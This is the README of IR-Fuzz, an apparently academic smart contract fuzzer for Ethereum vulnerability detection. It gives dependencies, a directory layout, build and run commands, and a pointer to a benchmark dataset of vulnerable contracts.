IR-Fuzz

Rethinking Smart Contract Fuzzing: Fuzzing With Invocation Ordering and Important Branch Revisiting.

Requirements

IR-Fuzz is executed on Linux (ideally Ubuntu 18.04).

Dependencies:

• CMake: >=3.5.1
• Python: >=3.5（ideally 3.6）
• Go: >=1.15
• leveldb 1.20
• Geth & Tools: geth, evm, etc
• solc: 0.4.26
• numpy

Architecture

$(IR-Fuzz)
├── sFuzz
│   ├── fuzzer
│   ├── libfuzzer
│   ├── liboracle
│   └── ...
├── bran
│   └── ...
├── tools
│   ├── requirements.txt
│   └── ...
├── assets
│   ├── ReentrancyAttacker_model.sol
│   ├── ReentrancyAttacker.sol
│   └── ...
├── source_code
│   └── ...
├── contracts
│   └── ...
├── branch_msg
│   └── ...
├── logs
│   └── ...
├── fuzz
├── initial_.sh
├── rename_src.sh
├── run.sh
└── README.md

• sFuzz: The basic fuzzing module of IR-Fuzz
• bran: The abstract interpreter for path analysis
• tools: The static analysis tools for extracting vulnerability-specific patterns
  • requirements.txt：Required python dependencies
• assets:
  • ReentrancyAttacker_model.sol: The template for constructing an attacker contract
  • ReentrancyAttacker.sol: The attacker contract generated based on the template
• source_code: Store the source code (.sol) of the contract under test
• contracts/example1: Store the compiled results of the contract under test
• branch_msg: Store the intermediate representations of the contract under test
• logs: Store the execution report during fuzzing
• fuzz: The complied executable fuzzer file (if you want to re-compile a fuzz file, you can refer to the following complete execution)

Quick Start

Path analysis

cd ./bran/
go build -v -o ../analyse_prefix

Rename contract under test

cd ..
cd ./tools/
python3 rename_contracts.py

Execute the fuzzer

cd ..
./run.sh

Complete Execution

• Initialization and Install system dependencies (This step will consume a lot of time.)

./initial_.sh

• Make workspace for the contract in directory source_code

./rename_src.sh

• Run IR-Fuzz and perform vulnerability detection

./run.sh

Note

• The code is adapted from sFuzz (a state-of-the-art fuzzer for smart contracts) and bran (a static analysis framework for EVM bytecode).

• If you download the boost version >= 1.7.0, you need to update the ".get_io_service()" (in sFuzz/libp2p/RLPxHandshake.h) to ".get_executor()". (We have updated in this project).

• If any question, please email to messi.qp711@gmail.com.

Dataset

We release the benchmark dataset collected from Etherescan, which contains over 12K Ethereum smart contracts and concerns eight types of vulnerabilities. More details for the dataset instruction can be found on our dataset page at Smart-Contract-Dataset, which is continuously improving.